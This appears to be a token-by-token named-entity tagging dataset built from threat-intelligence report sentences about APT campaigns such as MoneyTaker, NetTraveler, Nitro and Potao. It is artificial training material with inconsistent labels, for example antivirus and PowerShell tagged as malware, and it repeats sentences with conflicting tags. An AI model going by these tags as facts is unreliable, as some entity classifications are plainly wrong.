+before O
+the O
+campaign O
+related O
+to O
+the O
+sez O
+. O
+
+In O
+late O
+September B-TIME
+2015 E-TIME
+Mofang S-APT
+used O
+the O
+website O
+of O
+Myanmar S-LOC
+'s O
+national O
+airline O
+hosted O
+at O
+www.flymna.com O
+for O
+an O
+attack O
+against O
+an O
+organization O
+in O
+Myanmar S-LOC
+. O
+
+In O
+December B-TIME
+2012 E-TIME
+Mofang O
+started O
+a O
+campaign O
+against O
+a O
+new O
+target O
+, O
+called O
+' O
+seg O
+' O
+for O
+the O
+purpose O
+of O
+this O
+report O
+. O
+
+From O
+the O
+configuration O
+it O
+can O
+be O
+determined O
+that O
+the O
+company O
+was O
+running O
+F-Secure B-MAL
+Antivirus E-MAL
+and O
+Mofang S-MAL
+registered O
+the O
+domain O
+to O
+not O
+appear O
+suspicious O
+. O
+
+In O
+September B-TIME
+2015 E-TIME
+Mofang S-APT
+launched O
+another O
+attack O
+. O
+
+A O
+new O
+version O
+of O
+ShimRat S-MAL
+was O
+built O
+on O
+the O
+7th O
+of O
+September O
+, O
+uploaded O
+to O
+the O
+server O
+and O
+only O
+days O
+later O
+used O
+in O
+a O
+new O
+campaign O
+. O
+
+MoneyTaker O
+has O
+primarily O
+been O
+targeting O
+card O
+processing O
+systems O
+, O
+including O
+the O
+AWS O
+CBR O
+( O
+Russian O
+Interbank O
+System O
+) O
+and O
+purportedly O
+SWIFT O
+( O
+US O
+) O
+. O
+
+Given O
+the O
+wide O
+usage O
+of O
+STAR O
+in O
+LATAM O
+, O
+financial B-IDTY
+institutions E-IDTY
+in O
+LATAM O
+could O
+have O
+particular O
+exposure O
+to O
+a O
+potential O
+interest O
+from O
+the O
+MoneyTaker B-APT
+group E-APT
+. O
+
+In O
+addition O
+to O
+banks S-IDTY
+, O
+the O
+MoneyTaker B-APT
+group E-APT
+has O
+attacked O
+law B-IDTY
+firms E-IDTY
+and O
+also O
+financial O
+software O
+vendors O
+. O
+
+Since O
+that O
+time O
+, O
+the O
+group O
+attacked O
+companies O
+in O
+California S-LOC
+, O
+Utah S-LOC
+, O
+Oklahoma S-LOC
+, O
+Colorado S-LOC
+, O
+Illinois S-LOC
+, O
+Missouri S-LOC
+, O
+South B-LOC
+Carolina E-LOC
+, O
+North B-LOC
+Carolina E-LOC
+, O
+Virginia S-LOC
+and O
+Florida S-LOC
+. O
+
+The O
+first O
+attack O
+in O
+the O
+US O
+that O
+Group-IB S-SECTEAM
+attributes O
+to O
+MoneyTaker O
+was O
+conducted O
+in O
+the O
+spring O
+of O
+2016 S-TIME
+: O
+money O
+was O
+stolen O
+from O
+the O
+bank S-IDTY
+by O
+gaining O
+access O
+to O
+First O
+Data O
+'s O
+" O
+STAR O
+" O
+network O
+operator O
+portal O
+. O
+
+The O
+first O
+attack O
+in O
+the O
+US S-LOC
+that O
+Group-IB S-SECTEAM
+attributes O
+to O
+this O
+group O
+was O
+conducted O
+in O
+the O
+spring O
+of O
+2016 S-TIME
+: O
+money O
+was O
+stolen O
+from O
+the O
+bank S-IDTY
+by O
+gaining O
+access O
+to O
+First O
+Data O
+'s O
+" O
+STAR O
+" O
+network O
+operator O
+portal O
+. O
+
+In O
+2017 O
+, O
+the O
+number O
+of O
+MoneyTaker S-APT
+'s O
+attacks O
+has O
+remained O
+the O
+same O
+with O
+8 O
+US S-LOC
+banks S-IDTY
+, O
+1 O
+law B-IDTY
+firm E-IDTY
+and O
+1 O
+bank S-IDTY
+in O
+Russia O
+being O
+targeted O
+. O
+
+In O
+2017 S-TIME
+, O
+the O
+number O
+of O
+attacks O
+has O
+remained O
+the O
+same O
+with O
+8 O
+US O
+banks S-IDTY
+, O
+1 O
+law B-IDTY
+firm E-IDTY
+and O
+1 O
+bank S-IDTY
+in O
+Russia S-LOC
+being O
+targeted O
+. O
+
+By O
+analyzing O
+the O
+attack O
+infrastructure O
+, O
+Group-IB S-SECTEAM
+identified O
+that O
+MoneyTaker B-APT
+group E-APT
+continuously O
+exfiltrates O
+internal O
+banking O
+documentation O
+to O
+learn O
+about O
+bank S-IDTY
+operations O
+in O
+preparation O
+for O
+future O
+attacks O
+. O
+
+Group-IB S-SECTEAM
+reports O
+that O
+MoneyTaker O
+uses O
+both O
+borrowed O
+and O
+their O
+own O
+self-written O
+tools O
+. O
+
+Group-IB S-SECTEAM
+has O
+provided O
+Europol O
+and O
+Interpol O
+with O
+detailed O
+information O
+about O
+the O
+MoneyTaker O
+group O
+for O
+further O
+investigative O
+activities S-ACT
+as O
+part O
+of O
+our O
+cooperation O
+in O
+fighting O
+cybercrime O
+. O
+
+In O
+late O
+September B-TIME
+2015 E-TIME
+Mofang O
+used O
+the O
+website O
+of O
+Myanmara O
+'s O
+national O
+airline O
+hosted O
+at O
+www.flymna.com O
+for O
+an O
+attack O
+against O
+an O
+organization O
+in O
+Myanmar S-LOC
+. O
+
+To O
+control O
+the O
+full O
+operation O
+, O
+MoneyTaker S-APT
+uses O
+a O
+Pentest B-MAL
+framework I-MAL
+Server E-MAL
+. O
+
+On O
+it O
+, O
+MoneyTaker S-APT
+install O
+a O
+legitimate O
+tool O
+for O
+penetration O
+testing O
+– O
+Metasploit S-MAL
+. O
+
+At O
+the O
+end O
+of O
+June B-TIME
+2015 E-TIME
+Mofang O
+started O
+its O
+campaign O
+to O
+gather O
+information O
+of O
+a O
+specific O
+target O
+in O
+relation O
+to O
+the O
+sezs O
+: O
+the O
+cpg B-IDTY
+Corporation E-IDTY
+. O
+
+MoneyTaker S-APT
+uses O
+' O
+fileless S-MAL
+' O
+malware O
+only O
+existing O
+in O
+RAM O
+and O
+is O
+destroyed O
+after O
+reboot O
+. O
+
+To O
+ensure O
+persistence O
+in O
+the O
+system O
+MoneyTaker S-APT
+relies O
+on O
+PowerShell S-MAL
+and O
+VBS B-MAL
+scripts E-MAL
+- O
+they O
+are O
+both O
+difficult O
+to O
+detect O
+by O
+antivirus O
+and O
+easy O
+to O
+modify O
+. O
+
+After O
+successfully O
+infecting O
+one O
+of O
+the O
+computers O
+and O
+gaining O
+initial O
+access O
+to O
+the O
+system O
+, O
+the O
+attackers O
+perform O
+reconnaissance O
+of O
+the O
+local O
+network O
+in O
+order O
+to O
+gain O
+domain O
+administrator O
+privileges O
+and O
+eventually O
+consolidate O
+control O
+over O
+the O
+network O
+. O
+
+MUSTANG B-APT
+PANDA E-APT
+has O
+previously O
+used O
+the O
+observed O
+microblogging O
+site O
+to O
+host O
+malicious O
+PowerShell B-MAL
+scripts E-MAL
+and O
+Microsoft B-MAL
+Office I-MAL
+documents E-MAL
+in O
+targeted B-ACT
+attacks E-ACT
+on O
+Mongolia-focused O
+NGOs S-IDTY
+. O
+
+This O
+newly O
+observed O
+activity O
+uses O
+a O
+series O
+of O
+redirections O
+and O
+fileless O
+, O
+malicious O
+implementations O
+of O
+legitimate O
+tools O
+to O
+gain O
+access O
+to O
+the O
+targeted O
+systems O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+recently O
+identified O
+a O
+targeted B-ACT
+attack E-ACT
+against O
+an O
+individual O
+working O
+for O
+the O
+Foreign B-IDTY
+Ministry E-IDTY
+of O
+Uzbekistan B-LOC
+in I-LOC
+China E-LOC
+. O
+
+Since O
+that O
+time O
+, O
+MoneyTaker S-APT
+attacked O
+companies O
+in O
+California S-LOC
+, O
+Utah S-LOC
+, O
+Oklahoma S-LOC
+, O
+Colorado S-LOC
+, O
+Illinois S-LOC
+, O
+Missouri S-LOC
+, O
+South B-LOC
+Carolina E-LOC
+, O
+North B-LOC
+Carolina E-LOC
+, O
+Virginia S-LOC
+and O
+Florida S-LOC
+. O
+
+In O
+their O
+Operation B-ACT
+Tropic I-ACT
+Trooper E-ACT
+report O
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+documented O
+the O
+behaviour O
+and O
+functionality O
+of O
+an O
+espionage B-FILE
+toolkit E-FILE
+with O
+several O
+design O
+similarities O
+to O
+those O
+observed O
+in O
+the O
+various O
+components O
+of O
+KeyBoy S-MAL
+. O
+
+Our O
+analysis O
+shows O
+that O
+actors O
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+'s O
+analysis O
+shows O
+that O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+Our O
+analysis O
+shows O
+that O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+In O
+2016 S-TIME
+, O
+Group-IB S-SECTEAM
+identified O
+10 O
+attacks O
+conducted O
+by O
+MoneyTaker O
+, O
+6 O
+attacks O
+on O
+banks S-IDTY
+in O
+the O
+US S-LOC
+, O
+1 O
+attack O
+on O
+a O
+US S-LOC
+service B-IDTY
+provider E-IDTY
+, O
+1 O
+attack O
+on O
+a O
+bank S-IDTY
+in O
+the O
+UK S-LOC
+and O
+2 O
+attacks O
+on O
+Russian S-LOC
+banks S-IDTY
+. O
+
+If O
+KeyBoy S-MAL
+is O
+a O
+single O
+component O
+of O
+a O
+larger O
+espionage O
+toolkit O
+, O
+the O
+developers O
+may O
+have O
+realized O
+that O
+this O
+older O
+, O
+static-key O
+based O
+, O
+configuration B-MAL
+encoding I-MAL
+algorithm E-MAL
+was O
+inadvertently O
+providing O
+a O
+link O
+between O
+disparate O
+components O
+of O
+their O
+malware O
+suite O
+. O
+
+In O
+2016 S-TIME
+, O
+Group-IB S-SECTEAM
+identified O
+10 O
+attacks O
+conducted O
+by O
+MoneyTaker O
+; O
+6 O
+attacks O
+on O
+banks S-IDTY
+in O
+the O
+US S-LOC
+, O
+1 O
+attack O
+on O
+a O
+US S-LOC
+service B-IDTY
+provider E-IDTY
+, O
+1 O
+attack O
+on O
+a O
+bank S-IDTY
+in O
+the O
+UK S-LOC
+and O
+2 O
+attacks O
+on O
+Russian S-LOC
+banks S-IDTY
+. O
+
+The O
+NetTraveler B-MAL
+trojan E-MAL
+has O
+been O
+known O
+to O
+be O
+used O
+in O
+targeted O
+cyber B-ACT
+espionage I-ACT
+attacks E-ACT
+for O
+more O
+than O
+a O
+decade O
+by O
+nation O
+state O
+threat O
+actors O
+and O
+continues O
+to O
+be O
+used O
+to O
+target O
+its O
+victims O
+and O
+exfiltrate O
+data O
+. O
+
+The O
+exploit B-FILE
+document E-FILE
+carrying O
+this O
+alternate O
+KeyBoy S-MAL
+configuration O
+also O
+used O
+a O
+decoy B-FILE
+document E-FILE
+which O
+was O
+displayed O
+to O
+the O
+user O
+after O
+the O
+exploit S-VULNAME
+launched O
+. O
+
+Only O
+one O
+incident O
+involving O
+a O
+Russian O
+bank S-IDTY
+was O
+promptly O
+identified O
+and O
+prevented O
+that O
+is O
+known O
+to O
+Group-IB S-SECTEAM
+. O
+
+This O
+program O
+is O
+designed O
+to O
+capture O
+keystrokes O
+, O
+take O
+screenshots O
+of O
+the O
+user O
+'s O
+desktop O
+and O
+get O
+contents O
+from O
+the O
+clipboard O
+. O
+
+To O
+conduct O
+targeted B-ACT
+attacks E-ACT
+, O
+MoneyTaker S-APT
+use O
+a O
+distributed B-MAL
+infrastructure E-MAL
+that O
+is O
+difficult O
+to O
+track O
+. O
+
+This O
+technique O
+hides O
+the O
+true O
+C2 S-TOOL
+server O
+from O
+researchers O
+that O
+do O
+not O
+have O
+access O
+to O
+both O
+the O
+rastls.dll S-FILE
+and O
+Sycmentec.config B-FILE
+files E-FILE
+. O
+
+Hackers O
+use O
+Metasploit S-MAL
+to O
+conduct O
+all O
+these O
+activities S-ACT
+: O
+network B-ACT
+reconnaissance E-ACT
+, O
+search O
+for O
+vulnerable B-ACT
+applications E-ACT
+, O
+exploit S-VULNAME
+vulnerabilities O
+, O
+escalate O
+systems O
+privileges O
+, O
+and O
+collect O
+information O
+. O
+
+Over O
+the O
+years O
+they've O
+used O
+application O
+components O
+from O
+Norman S-SECTEAM
+, O
+McAfee S-SECTEAM
+and O
+Norton S-SECTEAM
+. O
+
+Recently O
+, O
+Falcon B-SECTEAM
+Intelligence E-SECTEAM
+observed O
+new O
+activity O
+from O
+MUSTANG O
+PANDA O
+, O
+using O
+a O
+unique O
+infection B-MAL
+chain E-MAL
+to O
+target O
+likely O
+Mongolia-based O
+victims O
+. O
+
+Throughout O
+the O
+years O
+, O
+the O
+Mofang O
+group O
+has O
+compromised O
+countless O
+servers O
+belonging O
+to O
+government S-IDTY
+or O
+other O
+Myanmar O
+related O
+organizations O
+, O
+in O
+order O
+to O
+stage O
+attacks O
+. O
+
+This O
+file O
+requires O
+the O
+target O
+to O
+attempt O
+to O
+open O
+the O
+.lnk B-FILE
+file E-FILE
+, O
+which O
+redirects O
+the O
+user O
+to O
+a O
+Windows S-OS
+Scripting O
+Component O
+( O
+.wsc O
+) O
+file O
+, O
+hosted O
+on O
+an O
+adversary-controlled O
+microblogging O
+page O
+. O
+
+A O
+report O
+published O
+by O
+Kaspersky B-SECTEAM
+Labs E-SECTEAM
+in O
+2011 S-TIME
+on O
+NetTraveler S-MAL
+also O
+mentions O
+the O
+C2 S-TOOL
+servers O
+were O
+being O
+hosted O
+by O
+Krypt O
+Technolgies O
+. O
+
+Obviously O
+, O
+the O
+developers O
+behind O
+NetTraveler S-MAL
+have O
+taken O
+steps O
+to O
+try O
+to O
+hide O
+the O
+malware O
+'s O
+configuration O
+. O
+
+In O
+this O
+report O
+, O
+we'll O
+review O
+how O
+the O
+actors O
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+the O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+In O
+this O
+report O
+, O
+we'll O
+review O
+how O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+the O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+In O
+this O
+report O
+, O
+we'll O
+review O
+how O
+the O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+the O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+Upon O
+successful O
+exploitation O
+, O
+the O
+attachment S-FILE
+will O
+install O
+the O
+Trojan S-MAL
+known O
+as O
+NetTraveler S-MAL
+using O
+a O
+DLL B-FILE
+side-loading E-FILE
+attack O
+technique O
+. O
+
+NetTraveler S-MAL
+has O
+been O
+used O
+to O
+target O
+diplomats S-IDTY
+, O
+embassies S-IDTY
+and O
+government B-IDTY
+institutions E-IDTY
+for O
+over O
+a O
+decade O
+, O
+and O
+remains O
+the O
+tool O
+of O
+choice O
+by O
+the O
+adversaries O
+behind O
+these O
+cyber B-ACT
+espionage I-ACT
+campaigns E-ACT
+. O
+
+WildFire S-SECTEAM
+correctly O
+classifies O
+NetTraveler S-MAL
+as O
+malicious O
+. O
+
+The O
+NetTraveler O
+group O
+has O
+infected O
+victims O
+across O
+multiple O
+establishments O
+in O
+both O
+the O
+public O
+and O
+private O
+sector O
+including O
+government B-IDTY
+institutions E-IDTY
+, O
+embassies S-IDTY
+, O
+the O
+oil B-IDTY
+and I-IDTY
+gas I-IDTY
+industry E-IDTY
+, O
+research O
+centers O
+, O
+military B-IDTY
+contractors E-IDTY
+and O
+activists S-IDTY
+. O
+
+Today O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+team O
+of O
+experts O
+published O
+a O
+new O
+research O
+report O
+about O
+NetTraveler S-MAL
+, O
+which O
+is O
+a O
+family O
+of O
+malicious O
+programs O
+used O
+by O
+APT O
+actors O
+to O
+successfully O
+compromise O
+more O
+than O
+350 O
+high-profile O
+victims O
+in O
+40 O
+countries O
+. O
+
+According O
+to O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+report O
+, O
+this O
+threat O
+actor O
+has O
+been O
+active O
+since O
+as O
+early O
+as O
+2004 O
+; O
+however O
+, O
+the O
+highest O
+volume O
+of O
+activity O
+occurred O
+from O
+2010 B-TIME
+– I-TIME
+2013 E-TIME
+. O
+
+Most O
+recently O
+, O
+the O
+NetTraveler O
+group O
+'s O
+main O
+domains O
+of O
+interest O
+for O
+cyberespionage B-ACT
+activities E-ACT
+include O
+space B-IDTY
+exploration E-IDTY
+, O
+nanotechnology S-IDTY
+, O
+energy B-IDTY
+production E-IDTY
+, O
+nuclear B-IDTY
+power E-IDTY
+, O
+lasers S-IDTY
+, O
+medicine S-IDTY
+and O
+communications S-IDTY
+. O
+
+In O
+addition O
+, O
+the O
+NetTraveler B-MAL
+toolkit E-MAL
+was O
+able O
+to O
+install O
+additional O
+info-stealing O
+malware O
+as O
+a O
+backdoor O
+, O
+and O
+it O
+could O
+be O
+customized O
+to O
+steal O
+other O
+types O
+of O
+sensitive O
+information O
+such O
+as O
+configuration O
+details O
+for O
+an O
+application O
+or O
+computer-aided O
+design O
+files O
+. O
+
+During O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+analysis O
+of O
+NetTraveler S-MAL
+, O
+the O
+company O
+'s O
+experts O
+identified O
+six O
+victims O
+that O
+had O
+been O
+infected O
+by O
+both O
+NetTraveler O
+and O
+Red O
+October O
+, O
+which O
+was O
+another O
+cyberespionage O
+operation O
+analyzed O
+by O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+in O
+January B-TIME
+2013 E-TIME
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+products O
+detect O
+and O
+neutralize O
+the O
+malicious O
+programs O
+and O
+its O
+variants O
+used O
+by O
+the O
+NetTraveler B-MAL
+Toolkit E-MAL
+, O
+including O
+Trojan-Spy.Win32.TravNet S-MAL
+and O
+Downloader.Win32.NetTraveler S-MAL
+. O
+
+Based O
+on O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+analysis O
+of O
+NetTraveler O
+'s O
+C&C S-TOOL
+data O
+, O
+there O
+were O
+a O
+total O
+of O
+350 O
+victims O
+in O
+40 O
+countries O
+across O
+including O
+the O
+United B-LOC
+States E-LOC
+, O
+Canada S-LOC
+, O
+United B-LOC
+Kingdom E-LOC
+, O
+Russia S-LOC
+, O
+Chile S-LOC
+, O
+Morocco S-LOC
+, O
+Greece S-LOC
+, O
+Belgium S-LOC
+, O
+Austria S-LOC
+, O
+Ukraine S-LOC
+, O
+Lithuania S-LOC
+, O
+Belarus S-LOC
+, O
+Australia S-LOC
+, O
+Hong B-LOC
+Kong E-LOC
+, O
+Japan S-LOC
+, O
+China S-LOC
+, O
+Mongolia S-LOC
+, O
+Iran S-LOC
+, O
+Turkey S-LOC
+, O
+India S-LOC
+, O
+Pakistan S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+Thailand S-LOC
+, O
+Qatar S-LOC
+, O
+Kazakhstan S-LOC
+, O
+and O
+Jordan S-LOC
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+products O
+detect O
+the O
+Microsoft B-IDTY
+Office E-IDTY
+exploits S-VULNAME
+used O
+in O
+the O
+spear-phishing S-ACT
+attacks E-ACT
+, O
+including O
+Exploit.MSWord.CVE-2010-333 S-FILE
+, O
+Exploit.Win32.CVE-2012-0158 S-FILE
+. O
+
+In O
+this O
+case O
+, O
+it O
+was O
+a O
+group O
+commonly O
+referred O
+to O
+as O
+" O
+Nitro O
+" O
+, O
+which O
+was O
+coined O
+by O
+Symantec S-SECTEAM
+in O
+its O
+2011 S-TIME
+whitepaper O
+. O
+
+Historically O
+, O
+Nitro O
+is O
+known O
+for O
+targeted O
+spear B-ACT
+phishing I-ACT
+campaigns E-ACT
+and O
+using O
+Poison B-MAL
+Ivy I-MAL
+malware E-MAL
+, O
+which O
+was O
+not O
+seen O
+in O
+these O
+attacks O
+. O
+
+Since O
+at O
+least O
+2013 S-TIME
+, O
+Nitro O
+appears O
+to O
+have O
+somewhat O
+modified O
+their O
+malware O
+and O
+delivery O
+methods O
+to O
+include O
+Spindest S-MAL
+and O
+legitimate B-MAL
+compromised I-MAL
+websites E-MAL
+, O
+as O
+reported O
+by O
+Cyber B-SECTEAM
+Squared I-SECTEAM
+'s I-SECTEAM
+TCIRT E-SECTEAM
+. O
+
+In O
+July O
+, O
+Nitro O
+compromised O
+a O
+South B-LOC
+Korean E-LOC
+clothing O
+and O
+accessories O
+manufacturer O
+'s O
+website O
+to O
+serve O
+malware O
+commonly O
+referred O
+to O
+as O
+" O
+Spindest S-MAL
+" O
+. O
+Of O
+all O
+the O
+samples O
+we've O
+tied O
+to O
+this O
+activity O
+so O
+far O
+noted O
+in O
+this O
+blog O
+, O
+this O
+is O
+the O
+only O
+one O
+configured O
+to O
+connect O
+directly O
+to O
+an O
+IP S-PROT
+address O
+for O
+Command O
+and O
+Control O
+( O
+C2 S-TOOL
+) O
+. O
+
+The O
+next O
+sample O
+was O
+another O
+Spindest S-MAL
+variant O
+and O
+had O
+the O
+same O
+timestamp O
+as O
+the O
+aforementioned O
+PcClient B-MAL
+sample E-MAL
+. O
+
+As O
+this O
+post O
+and O
+previous O
+cited O
+research O
+show O
+, O
+APT O
+groups O
+such O
+as O
+Nitro O
+will O
+continue O
+to O
+evolve O
+their O
+techniques O
+within O
+the O
+kill O
+chain O
+to O
+avoid O
+detection O
+. O
+
+attacks O
+on O
+the O
+chemical B-IDTY
+industry E-IDTY
+are O
+merely O
+their O
+latest O
+attack O
+wave O
+. O
+
+The O
+goal O
+of O
+the O
+attackers O
+appears O
+to O
+be O
+to O
+collect O
+intellectual O
+property O
+such O
+as O
+design O
+documents O
+, O
+formulas O
+, O
+and O
+manufacturing O
+processes O
+. O
+
+The O
+attack O
+wave O
+started O
+in O
+late O
+July B-TIME
+2011 E-TIME
+and O
+continued O
+into O
+midSeptember O
+2011 S-TIME
+. O
+
+The O
+purpose O
+of O
+the O
+attacks O
+appears O
+to O
+be O
+industrial O
+espionage O
+, O
+collecting O
+intellectual O
+property O
+for O
+competitive O
+advantage O
+. O
+
+They O
+then O
+moved O
+on O
+to O
+the O
+motor B-IDTY
+industry E-IDTY
+in O
+late O
+May S-TIME
+. O
+
+From O
+late O
+April O
+to O
+early O
+May S-TIME
+, O
+the O
+attackers O
+focused O
+on O
+human O
+rights O
+related O
+NGOs S-IDTY
+. O
+
+Attackers O
+then O
+moved O
+on O
+to O
+the O
+motor B-IDTY
+industry E-IDTY
+in O
+late O
+May S-TIME
+. O
+
+At O
+this O
+point O
+, O
+the O
+current O
+attack B-ACT
+campaign E-ACT
+against O
+the O
+chemical B-IDTY
+industry E-IDTY
+began O
+. O
+
+The O
+attackers O
+first O
+researched O
+desired O
+targets O
+and O
+then O
+sent O
+an O
+email S-ACT
+specifically O
+to O
+the O
+target O
+. O
+
+First O
+, O
+when O
+a O
+specific O
+recipient O
+was O
+targeted O
+, O
+the O
+mails O
+often O
+purported O
+to O
+be O
+meeting O
+invitations O
+from O
+established O
+business O
+partners O
+. O
+
+While O
+the O
+attackers O
+used O
+different O
+pretexts O
+when O
+sending O
+these O
+malicious B-ACT
+emails S-TOOL
+, O
+two O
+methodologies O
+stood O
+out O
+. O
+
+Secondly O
+, O
+when O
+the O
+emails S-TOOL
+were O
+being O
+sent O
+to O
+a O
+broad O
+set O
+of O
+recipients O
+, O
+the O
+mails O
+purported O
+to O
+be O
+a O
+necessary O
+security O
+update O
+. O
+
+The O
+attacks O
+were O
+traced O
+back O
+to O
+a O
+computer O
+system O
+that O
+was O
+a O
+virtual O
+private O
+server O
+( O
+VPS S-TOOL
+) O
+located O
+in O
+the O
+United B-LOC
+States E-LOC
+. O
+
+Attackers O
+are O
+sending O
+malicious O
+PDF S-MAL
+and O
+DOC B-MAL
+files E-MAL
+, O
+which O
+use O
+exploits O
+to O
+drop O
+variants O
+of O
+Backdoor.Sogu S-MAL
+. O
+
+This O
+particular O
+threat O
+was O
+also O
+used O
+by O
+hackers O
+to O
+compromise O
+a O
+Korean O
+social O
+network O
+site O
+to O
+steal O
+records O
+of O
+35 O
+million O
+users O
+. O
+
+The O
+Sogu O
+gang O
+use O
+a O
+custom O
+developed O
+threat O
+– O
+Backdoor.Sogu S-MAL
+, O
+whereas O
+the O
+group O
+described O
+in O
+this O
+document O
+use O
+an O
+off O
+the O
+shelf O
+threat O
+– O
+Poison B-MAL
+Ivy E-MAL
+. O
+
+The O
+Sogu O
+gang O
+, O
+in O
+contrast O
+, O
+use O
+PDF S-MAL
+and O
+DOC B-MAL
+files E-MAL
+in O
+very O
+tailored O
+, O
+targeted O
+emails S-TOOL
+. O
+
+These O
+attacks O
+are O
+primarily O
+targeting O
+private B-IDTY
+industry E-IDTY
+in O
+search O
+of O
+key O
+intellectual O
+property O
+for O
+competitive O
+advantage O
+, O
+military B-IDTY
+institutions E-IDTY
+, O
+and O
+governmental B-IDTY
+organizations E-IDTY
+often O
+in O
+search O
+of O
+documents O
+related O
+to O
+current O
+political S-IDTY
+events O
+and O
+human B-IDTY
+rights I-IDTY
+organizations E-IDTY
+. O
+
+Nitro S-APT
+'s O
+campaign O
+focused O
+on O
+the O
+chemical B-IDTY
+sector E-IDTY
+with O
+the O
+goal O
+of O
+obtaining O
+sensitive O
+documents O
+such O
+as O
+proprietary O
+designs O
+, O
+formulas O
+, O
+and O
+manufacturing O
+processes O
+. O
+
+This O
+attack B-ACT
+campaign E-ACT
+focused O
+on O
+the O
+chemical B-IDTY
+sector E-IDTY
+with O
+the O
+goal O
+of O
+obtaining O
+sensitive O
+documents O
+such O
+as O
+proprietary O
+designs O
+, O
+formulas O
+, O
+and O
+manufacturing O
+processes O
+. O
+
+These O
+have O
+been O
+highly O
+active O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+and O
+unveiled O
+ongoing O
+targeted B-ACT
+attacks E-ACT
+in O
+multiple O
+regions O
+. O
+
+The O
+attackers O
+try O
+to O
+lure O
+targets O
+through O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+that O
+include O
+compressed O
+executables O
+. O
+
+We O
+found O
+that O
+the O
+group O
+behind O
+this O
+campaign O
+targeted O
+mainly O
+industrial S-IDTY
+, O
+engineering S-IDTY
+and O
+manufacturing B-IDTY
+organizations E-IDTY
+in O
+more O
+than O
+30 O
+countries O
+. O
+
+Using O
+the O
+Kaspersky B-SECTEAM
+Security I-SECTEAM
+Network E-SECTEAM
+( O
+KSN S-SECTEAM
+) O
+and O
+artifacts O
+from O
+malware O
+files O
+and O
+attack O
+sites O
+, O
+we O
+were O
+able O
+to O
+trace O
+the O
+attacks O
+back O
+to O
+March B-TIME
+2015 E-TIME
+. O
+
+Operation B-ACT
+Ghoul E-ACT
+is O
+one O
+of O
+the O
+many O
+attacks O
+in O
+the O
+wild O
+targeting O
+industrial S-IDTY
+, O
+manufacturing S-IDTY
+and O
+engineering B-IDTY
+organizations E-IDTY
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+recommends O
+users O
+to O
+be O
+extra O
+cautious O
+while O
+checking O
+and O
+opening O
+emails B-ACT
+and I-ACT
+attachments E-ACT
+. O
+
+The O
+main O
+point O
+that O
+sets O
+Operation B-ACT
+Groundbait E-ACT
+apart O
+from O
+the O
+other O
+attacks O
+is O
+that O
+it O
+has O
+mostly O
+been O
+targeting O
+anti-government B-IDTY
+separatists E-IDTY
+in O
+the O
+self-declared O
+Donetsk O
+and O
+Luhansk O
+People O
+'s O
+Republics O
+. O
+
+The O
+attacks O
+appear O
+to O
+be O
+geopolitically O
+motivated O
+and O
+target O
+high B-IDTY
+profile I-IDTY
+organizations E-IDTY
+. O
+
+The O
+objective O
+of O
+the O
+attacks O
+is O
+clearly O
+espionage O
+– O
+they O
+involve O
+gaining O
+access O
+to O
+top O
+legislative O
+, O
+executive O
+and O
+judicial O
+bodies O
+around O
+the O
+world O
+. O
+
+The O
+attackers O
+have O
+targeted O
+a O
+large O
+number O
+of O
+organizations O
+globally O
+since O
+early O
+2017 S-TIME
+, O
+with O
+the O
+main O
+focus O
+on O
+the O
+Middle B-LOC
+East E-LOC
+and O
+North B-LOC
+Africa E-LOC
+( O
+MENA S-LOC
+) O
+, O
+especially O
+Palestine O
+. O
+
+The O
+attacks O
+were O
+initially O
+discovered O
+while O
+investigating O
+a O
+phishing B-ACT
+attack E-ACT
+that O
+targeted O
+political S-IDTY
+figures O
+in O
+the O
+MENA S-LOC
+region O
+. O
+
+Like O
+BlackEnergy S-MAL
+( O
+a.k.a. O
+Sandworm S-APT
+, O
+Quedagh S-APT
+) O
+, O
+Potao S-MAL
+is O
+an O
+example O
+of O
+targeted O
+espionage O
+( O
+APT O
+) O
+malware O
+detected O
+mostly O
+in O
+Ukraine S-LOC
+and O
+a O
+number O
+of O
+other O
+CIS O
+countries O
+, O
+including O
+Russia S-LOC
+, O
+Georgia S-LOC
+and O
+Belarus S-LOC
+. O
+
+The O
+main O
+reason O
+for O
+the O
+increase O
+in O
+Potao S-MAL
+detections O
+in O
+2014 S-TIME
+and O
+2015 S-TIME
+were O
+infections O
+through O
+USB O
+drives O
+. O
+
+The O
+first O
+Potao B-ACT
+campaign E-ACT
+that O
+we O
+examined O
+took O
+place O
+in O
+August B-TIME
+2011 E-TIME
+. O
+
+In O
+March B-TIME
+2014 E-TIME
+, O
+the O
+gang O
+behind O
+Potao S-MAL
+started O
+using O
+a O
+new O
+infection B-MAL
+vector E-MAL
+. O
+
+Since O
+March B-TIME
+2015 E-TIME
+, O
+ESET S-SECTEAM
+has O
+detected O
+Potao S-MAL
+binaries O
+at O
+several O
+high-value O
+Ukrainian S-LOC
+targets O
+that O
+include O
+government S-IDTY
